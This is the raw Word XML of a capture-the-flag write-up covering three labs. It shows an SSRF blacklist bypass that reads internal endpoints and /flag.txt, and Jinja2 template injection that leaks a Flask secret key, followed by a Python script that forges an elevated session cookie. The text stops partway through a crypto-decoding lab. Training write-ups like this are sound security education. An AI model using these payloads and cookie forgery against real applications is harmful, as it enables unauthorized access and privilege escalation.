        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>🚩</w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C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  FLAG: </w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CyberHx{phantom_signal_recovered}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC05F09" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000">
      <w:pPr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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="050A8316" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="00B4D8"/>
        </w:pBdr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lastRenderedPageBreak/>
        <w:t>ZeroDayHeist Series — Labs 01-03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5399E9" w14:textId="4740B2E4" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="16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b/>
          <w:bCs/>
          <w:color w:val="0A2342"/>
        </w:rPr>
        <w:t xml:space="preserve">Platform: </w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2C2C2C"/>
        </w:rPr>
        <w:t>ZeroDayHeist / CyberHx CTF</w:t>
      </w:r>
      <w:r w:rsidR="006D1AB5" w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2C2C2C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2C2C2C"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="006D1AB5" w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2342"/>
        </w:rPr>
        <w:t xml:space="preserve"> A</w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2342"/>
        </w:rPr>
        <w:t xml:space="preserve">uthor: </w:t>
      </w:r>
      <w:r w:rsidR="0011240C" w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2C2C2C"/>
        </w:rPr>
        <w:t>WR26</w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2C2C2C"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2342"/>
        </w:rPr>
        <w:t xml:space="preserve">Date: </w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2C2C2C"/>
        </w:rPr>
        <w:t>June 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45448551" w14:textId="5E28DA5C" w:rsidR="00D5087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Lab 01 — Professor Mind</w:t>
      </w:r>
      <w:r w:rsidR="006D1AB5" w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54ACCD9F" w14:textId="62516A70" w:rsidR="00AE5E00" w:rsidRPr="0011240C" w:rsidRDefault="00AE5E00">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE5E00">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="686D3070" wp14:editId="437F781C">
            <wp:extent cx="5943600" cy="5435600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28255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58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500F" w14:textId="15BF4874" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="12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b/>
          <w:bCs/>
          <w:color w:val="0A2342"/>
        </w:rPr>
        <w:t xml:space="preserve">Target: </w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="00B4D8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">https://chall-1--kushdwivedikd.replit.app/ </w:t>
      </w:r>
      <w:r w:rsidR="006D1AB5" w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0A2342"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="006D1AB5" w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2342"/>
        </w:rPr>
        <w:t xml:space="preserve"> T</w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2342"/>
        </w:rPr>
        <w:t xml:space="preserve">echniques: </w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2C2C2C"/>
        </w:rPr>
        <w:t>SSRF + Internal API + File Read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFB5545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Phase 1 — Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310321CB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The target page revealed a DEAD VAULT theme with 3 characters: Tokyo, El Profesor, and Berlin. The terminal status showed: FLAG_STATUS: FRAGMENTED — 3 PIECES and SECURITY: BLACKLIST ACTIVE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60342789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Visiting /hints revealed the following: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80"/>
        <w:gridCol w:w="3480"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D5087C" w:rsidRPr="0011240C" w14:paraId="06B950F5" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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94DA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Character</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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401F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Hint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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C9F55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Implication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5087C" w:rsidRPr="0011240C" w14:paraId="7C3D27B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68A6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Tokyo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7123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"address begins with 127... /internal-???"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1478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SSRF + Internal API</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5087C" w:rsidRPr="0011240C" w14:paraId="5118D4B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904B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lastRenderedPageBreak/>
              <w:t>El Profesor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7937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"config holds two things: token + fragment"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295F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/config endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5087C" w:rsidRPr="0011240C" w14:paraId="0EE89EC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4019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Berlin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E8F4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"/flag.txt... token is the key"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CBBB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File read with token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D1FE39B" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="12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b/>
          <w:bCs/>
          <w:color w:val="0A2342"/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6B6456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POST /login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F50579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username=guest  password=guest123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDF9859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2FE45A50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Decoded session cookie:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6669809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{"role": "user", "user": "guest"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7876C5F1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Phase 2 — SSRF Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F94AB61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The POST /fetch endpoint accepted a url parameter but blacklisted "localhost" and "169.254". Since the check was string-based, it was bypassed using the numeric IP 127.0.0.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057F99C2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Fragment 1 — Tokyo (Internal API):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3A6226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POST /fetch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D407E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url=http://127.0.0.1:5000/internal-api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363FCFF5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4919B5D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Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A617F52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"tokyo_fragment": "Zer0d4yh31st{d34d_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095E6FEB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Fragment 2 — El Profesor (Internal Config):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F8390E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POST /fetch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB187C7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url=http://127.0.0.1:5000/internal-api/config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B2D840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3C1EEBF0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Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094E241E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"professor_fragment": "m3n_t3ll_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CC42C8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"file_reader_token": "79821ff136bdd3608ef68263993cafcf"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582AA8C1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Phase 3 — Token-Based File Read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7798D37E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Fragment 3 — Berlin (/flag.txt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF691BE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POST /fetch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A42015C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url=http://127.0.0.1:5000/internal/file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313B105F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?token=79821ff136bdd3608ef68263993cafcf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EFE03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&amp;path=/flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7926F9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04D8F082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Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118F5ABC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"berlin_fragment": "n0_t4l3s}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439897EB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Phase 4 — Flag Assembly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5008DFFF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Tokyo     : Zer0d4yh31st{d34d_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F861A5E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Professor : m3n_t3ll_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AE7518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Berlin    : n0_t4l3s}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCEF7C0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-----------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08037F62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FLAG      : Zer0d4yh31st{d34d_m3n_t3ll_n0_t4l3s}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093A852F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 xml:space="preserve">           = "Zero Day Heist {dead men tell no tales}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2514007E" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="00B4D8"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="00B4D8"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="00B4D8"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="00B4D8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="0A2342"/>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>🚩</w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C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  FLAG: </w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Zer0d4yh31st{d34d_m3n_t3ll_n0_t4l3s}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B639FE4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Attack Chain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5087C" w:rsidRPr="0011240C" w14:paraId="72E55E58" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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B790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lastRenderedPageBreak/>
              <w:t>Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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B89A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Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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A2A5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Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5087C" w:rsidRPr="0011240C" w14:paraId="446118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3DF8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316F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Credential reuse — POST /login (guest/guest123)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16BE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Session cookie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5087C" w:rsidRPr="0011240C" w14:paraId="0FDB87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ABEF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DD12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SSRF bypass via 127.0.0.1 on POST /fetch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CEEF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Internal API access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5087C" w:rsidRPr="0011240C" w14:paraId="70FA01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206F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3D0F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Internal API enum — /internal-api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304E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Tokyo fragment + endpoint list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5087C" w:rsidRPr="0011240C" w14:paraId="02AB5B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F537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2675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Internal config read — /internal-api/config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2A6C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Professor fragment + token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5087C" w:rsidRPr="0011240C" w14:paraId="40BC4B5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CCAF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0D2C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Token-based file read — /internal/file?token=...&amp;path=/flag.txt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3948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Berlin fragment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5087C" w:rsidRPr="0011240C" w14:paraId="12EE72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D7D9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67FD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Fragment concatenation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2BAE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FLAG</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60B40C1B" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00D5087C">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76414D09" w14:textId="77777777" w:rsidR="00D5087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Lab 02 — Bella Ciao Secure Comms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535B2531" w14:textId="73989FD8" w:rsidR="00AE5E00" w:rsidRPr="0011240C" w:rsidRDefault="00AE5E00">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE5E00">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41392737" wp14:editId="37129FD6">
            <wp:extent cx="5943600" cy="5443220"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="174459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95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3B52" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="12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b/>
          <w:bCs/>
          <w:color w:val="0A2342"/>
        </w:rPr>
        <w:t xml:space="preserve">Target: </w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="00B4D8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">https://chall-2--kdmrhacker.replit.app/  </w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2342"/>
        </w:rPr>
        <w:t xml:space="preserve">Techniques: </w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2C2C2C"/>
        </w:rPr>
        <w:t>SSTI (Jinja2) + Session Forgery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3185BE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Phase 1 — Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E49267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The homepage revealed two critical hints: "The greeting system renders your name directly" and "ENCRYPTION: Jinja2-256" — confirming the attack vector as Server-Side Template Injection (SSTI) with Jinja2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D16517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Phase 2 — Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1FFDF3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POST /login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425DF78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username=denver  password=hahahahaha</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EE660A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39CD5F9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Session role: recruit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D98C36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Accessible endpoints: /greet, /intel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E4B15C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Phase 3 — SSTI Detection &amp; Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A74E3AD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SSTI confirmation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414F21BD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GET /greet?name={{7*7}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CE2ADA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Response: "Hello 49!"   &lt;- Jinja2 template execution confirmed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674EA2D8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lastRenderedPageBreak/>
        <w:t>Secret key extraction via config dump:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECA1468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GET /greet?name={{config}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397DAEC0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SECRET_KEY leaked: lacasadepapel-secret-2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A5D4D7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Phase 4 — Session Forgery (Privilege Escalation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E314D2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Using the leaked secret key, a forged Flask session cookie was crafted with role: elite to bypass authorization and access /intel:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A29886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from flask import Flask</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC23D86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from flask.sessions import SecureCookieSessionInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BF0648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3060F8BC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app = Flask(__name__)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13331273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app.secret_key = 'lacasadepapel-secret-2024'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29578A90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si = SecureCookieSessionInterface()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6B866A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s = si.get_signing_serializer(app)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E104AA8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cookie = s.dumps({'codename': 'Denver', 'role': 'elite', 'user': 'denver'})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720CC0B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print(cookie)  # Forged elite session cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E49CA00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1FD751B8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GET /intel with forged cookie =&gt; FLAG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2266D317" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="00B4D8"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="00B4D8"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="00B4D8"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="00B4D8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="0A2342"/>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>🚩</w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C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  FLAG: </w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Zer0d4yh31st{sst1_t0_rce_b3ll4_c14o}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBCEBA0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Attack Chain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5087C" w:rsidRPr="0011240C" w14:paraId="3F3B0040" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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43E6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Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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A22C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Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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6719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Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5087C" w:rsidRPr="0011240C" w14:paraId="4CCD3D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6CBE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9886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Recon — homepage source analysis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5546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Jinja2 hint discovered</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5087C" w:rsidRPr="0011240C" w14:paraId="4B5F16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7F7F1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CC9D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Login — POST /login (denver/hahahahaha)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98AD0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recruit session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5087C" w:rsidRPr="0011240C" w14:paraId="0EA5ACF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E86A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F1B0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SSTI test — GET /greet?name={{7*7}}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DC35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Confirmed template execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5087C" w:rsidRPr="0011240C" w14:paraId="7277DE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D6DA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4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2F7B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Config dump — GET /greet?name={{config}}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43B2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SECRET_KEY leaked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5087C" w:rsidRPr="0011240C" w14:paraId="1B6345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CDDA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5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14D1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Session forge — Python script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49B3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elite cookie created</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5087C" w:rsidRPr="0011240C" w14:paraId="35F639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E175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6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232A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Privilege access — GET /intel + elite cookie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DE0C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FLAG</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="420492A9" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00D5087C">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="447B355C" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2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Lab 03 — Cryptography is Fun</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E55400C" w14:textId="2F6C7C34" w:rsidR="00AE5E00" w:rsidRPr="0011240C" w:rsidRDefault="00AE5E00">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE5E00">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FE5ACC1" wp14:editId="43045C4A">
            <wp:extent cx="5943600" cy="5659755"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="142076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66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EDB4" w14:textId="29807AF4" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="12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b/>
          <w:bCs/>
          <w:color w:val="0A2342"/>
        </w:rPr>
        <w:t xml:space="preserve">Platform: </w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="00B4D8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">CyberHx CTF (ctf.cyberhx.com)  </w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2342"/>
        </w:rPr>
        <w:t xml:space="preserve">Category: </w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2C2C2C"/>
        </w:rPr>
        <w:t xml:space="preserve">Crypto  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3DDFB8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Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BC5AB3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This challenge uses a 2-layer encoding scheme with noise characters as a red herring. The goal: strip noise → decode Base58 → decode Base64 → FLAG.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF08276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Layer 1 — Base58 Decode</w:t>
      </w:r>
    </w:p>
